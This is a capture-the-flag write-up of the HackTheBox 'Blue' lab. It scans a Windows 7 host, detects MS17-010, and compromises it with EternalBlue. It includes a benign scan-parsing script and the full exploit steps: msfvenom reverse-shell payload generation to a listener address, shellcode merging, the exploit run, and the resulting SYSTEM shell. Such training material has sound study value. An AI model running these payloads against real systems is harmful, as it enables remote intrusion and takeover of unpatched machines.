Cracking The Blue Box, EternalBlue

┌──(kali㉿kali)-[~/HackTheBox/Blue/recon]
└─$ nmap -sC -sV -p0-1000 10.10.10.40 > results.txt &
[1] 1377
┌──(kali㉿kali)-[~/HackTheBox/Blue/recon]
└─$ 1 ⚙
[1] + done nmap -sC -sV -p0-1000 10.10.10.40 > results.txt
┌──(kali㉿kali)-[~/HackTheBox/Blue/recon]
└─$ cat results.txt 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-12 08:07 EST
Nmap scan report for 10.10.10.40
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 40s, deviation: 1s, median: 39s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-01-12T13:08:13+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-01-12T13:08:12
|_ start_date: 2021-01-12T13:03:41
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.29 seconds
┌──(kali㉿kali)-[~/HackTheBox/Blue/recon]
└─$ nmap -p 445 --script vuln 10.10.10.40 > smbvulnerability.txt &
[1] 1575

┌──(kali㉿kali)-[~/HackTheBox/Blue/recon]
└─$ 1 ⚙
[1] + done nmap -p 445 --script vuln 10.10.10.40 > smbvulnerability.txt
┌──(kali㉿kali)-[~/HackTheBox/Blue/recon]
└─$ cat smbvulnerability.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-12 08:25 EST
Nmap scan report for 10.10.10.40
Host is up (0.20s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 27.82 seconds
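The two scans above carry everything needed to rate this host before any exploit is touched: SMB on 445, SMBv1 answering, message signing disabled, and the `smb-vuln-ms17-010` script reporting `State: VULNERABLE`. As an added example (not code from the original post, and not part of Nmap or the AutoBlue project), the Python script below parses that Nmap text into findings, handling the three shapes a `smb-vuln-*` script can produce: `false`, an `NT_STATUS_*` error (inconclusive, not "safe"), and a full VULNERABLE block. The `SERVICE_SCAN` and `VULN_SCAN` strings are constructed from the results.txt and smbvulnerability.txt output shown above; the severity labels are the example's own choice.

```python
"""Parse Nmap SMB service and vuln-script output into a list of findings.

Added example, not from the original write-up. The two SCAN strings below are
constructed from the results.txt and smbvulnerability.txt output shown above.
"""
import re
from dataclasses import dataclass

# Constructed sample: the relevant lines of the `nmap -sC -sV` output above.
SERVICE_SCAN = """\
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Host script results:
|_clock-skew: mean: 40s, deviation: 1s, median: 39s
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

# Constructed sample: the `nmap -p 445 --script vuln` output above.
VULN_SCAN = """\
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
# NSE script names are lowercase with at least one hyphen (smb-os-discovery,
# smb-vuln-ms17-010); sub-keys such as "OS:", "account_used:" or "State:" are not.
SCRIPT_NAME_RE = re.compile(r"^([a-z0-9]+(?:-[a-z0-9]+)+):\s*(.*)$")
SEVERITY_ORDER = {"high": 0, "medium": 1, "inconclusive": 2, "info": 3}


@dataclass
class Finding:
    check: str
    severity: str
    detail: str


def parse_ports(text):
    """Return {port: {state, service, version}} from the port table."""
    ports = {}
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            ports[int(m.group(1))] = {"state": m.group(3), "service": m.group(4), "version": m.group(5)}
    return ports


def parse_scripts(text):
    """Group the '|' lines of 'Host script results' under their script name."""
    scripts, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith("|"):
            current = None  # left the script block
            continue
        body = line.lstrip("|_ ").strip()
        m = SCRIPT_NAME_RE.match(body)
        if m:
            current = m.group(1)
            scripts[current] = [m.group(2)] if m.group(2) else []
        elif current is not None and body:
            scripts[current].append(body)
    return scripts


def assess(service_text, vuln_text):
    """Turn the two scans into findings, worst first."""
    ports = parse_ports(service_text)
    scripts = parse_scripts(service_text)
    scripts.update(parse_scripts(vuln_text))
    findings = []
    if ports.get(445, {}).get("state") == "open":
        findings.append(Finding("smb-exposed", "info", "445/tcp open: " + ports[445]["version"]))
    for line in scripts.get("smb-security-mode", []):
        if line.startswith("message_signing:") and "disabled" in line:
            findings.append(Finding("smb1-signing-disabled", "medium", line))
    for line in scripts.get("smb2-security-mode", []):
        if "not required" in line.lower():
            findings.append(Finding("smb2-signing-not-required", "medium", line))
    for name, lines in scripts.items():
        if not name.startswith("smb-vuln-"):
            continue
        if any(l.startswith("State: VULNERABLE") for l in lines):
            risk = next((l.split(":", 1)[1].strip().lower() for l in lines if l.startswith("Risk factor:")), "high")
            cves = sorted(set(re.findall(r"CVE-\d{4}-\d{4,}", " ".join(lines))))
            findings.append(Finding(name, risk, ", ".join(cves) or "no CVE listed"))
        elif lines and lines[0].lower() == "false":
            findings.append(Finding(name, "info", "not vulnerable"))
        else:
            # Script errored or printed something unexpected: report it, do not treat as safe.
            findings.append(Finding(name, "inconclusive", lines[0] if lines else "no output"))
    return sorted(findings, key=lambda f: (SEVERITY_ORDER.get(f.severity, 9), f.check))


if __name__ == "__main__":
    for f in assess(SERVICE_SCAN, VULN_SCAN):
        print(f"[{f.severity:>12}] {f.check}: {f.detail}")
```

Run against real output by reading the two files instead of the embedded strings; the parser strips Nmap's indentation, so it accepts both the aligned form Nmap prints and the collapsed form shown on this page. The point of the `inconclusive` branch is the `smb-vuln-ms10-061` line: `NT_STATUS_OBJECT_NAME_NOT_FOUND` means the check did not run, which is a different statement from `false`.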
┌──(kali㉿kali)-[~/…/Blue/exploits/AutoBlue-MS17-010/shellcode]
└─$ nasm -f bin eternalblue_kshellcode_x64.asm -o myexploit.bin;nasm -f bin eternalblue_kshellcode_x86.asm -o sc_x86_kernel.bin
┌──(kali㉿kali)-[~/…/Blue/exploits/AutoBlue-MS17-010/shellcode]
└─$ msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=10.10.14.7 LPORT=54;msfvenom -p windows/x64/shell_reverse_tcp EXITFUNC=thread LHOST=10.10.14.7 LPORT=53 -f raw -o sc_x64_msf.bin;cat sc_x64_kernel.bin sc_x64_msf.bin > sc_x64.bin;cat sc_x86_kernel.bin sc_x86_msf.bin > sc_x86.bin;python eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin

┌──(kali㉿kali)-[~/…/Blue/exploits/AutoBlue-MS17-010/shellcode]
└─$
┌──(kali㉿kali)-[~]
└─$ sudo nc -nvlp 53 1 ⨯
[sudo] password for kali:
listening on [any] 53 ...
┌──(kali㉿kali)-[~/HackTheBox/Blue/exploits/AutoBlue-MS17-010]
└─$ python3 eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin
shellcode size: 2203
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
┌──(kali㉿kali)-[~]
└─$ sudo nc -nvlp 53 1 ⨯
[sudo] password for kali:
listening on [any] 53 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\Users
cd C:\Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\Users
21/07/2017 06:56 <DIR> .
21/07/2017 06:56 <DIR> ..
21/07/2017 06:56 <DIR> Administrator
14/07/2017 13:45 <DIR> haris
12/04/2011 07:51 <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 15,890,034,688 bytes free
C:\Users>
C:\Users>cd haris
cd haris
C:\Users\haris>dir
dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\Users\haris
14/07/2017 13:45 <DIR> .
14/07/2017 13:45 <DIR> ..
15/07/2017 07:58 <DIR> Contacts
24/12/2017 02:23 <DIR> Desktop
15/07/2017 07:58 <DIR> Documents
15/07/2017 07:58 <DIR> Downloads
15/07/2017 07:58 <DIR> Favorites
15/07/2017 07:58 <DIR> Links
15/07/2017 07:58 <DIR> Music
15/07/2017 07:58 <DIR> Pictures
15/07/2017 07:58 <DIR> Saved Games
15/07/2017 07:58 <DIR> Searches
15/07/2017 07:58 <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 15,890,034,688 bytes free
C:\Users\haris>cd Desktop
cd Desktop
C:\Users\haris\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\Users\haris\Desktop
24/12/2017 02:23 <DIR> .
24/12/2017 02:23 <DIR> ..
21/07/2017 06:54 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 15,890,034,688 bytes free
C:\Users\haris\Desktop>
C:\Users>cd Administrator
cd Administrator
C:\Users\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\Users\Administrator
21/07/2017 06:56 <DIR> .
21/07/2017 06:56 <DIR> ..
21/07/2017 06:56 <DIR> Contacts
24/12/2017 02:22 <DIR> Desktop
21/07/2017 06:56 <DIR> Documents
21/07/2017 06:56 <DIR> Downloads
21/07/2017 06:56 <DIR> Favorites
21/07/2017 06:56 <DIR> Links
21/07/2017 06:56 <DIR> Music
21/07/2017 06:56 <DIR> Pictures
21/07/2017 06:56 <DIR> Saved Games
21/07/2017 06:56 <DIR> Searches
21/07/2017 06:56 <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 15,890,034,688 bytes free
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\Users\Administrator\Desktop
24/12/2017 02:22 <DIR> .
24/12/2017 02:22 <DIR> ..
21/07/2017 06:57 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 15,890,034,688 bytes free
C:\Users\Administrator\Desktop>

Varun
Grad Student. Member Bi0s.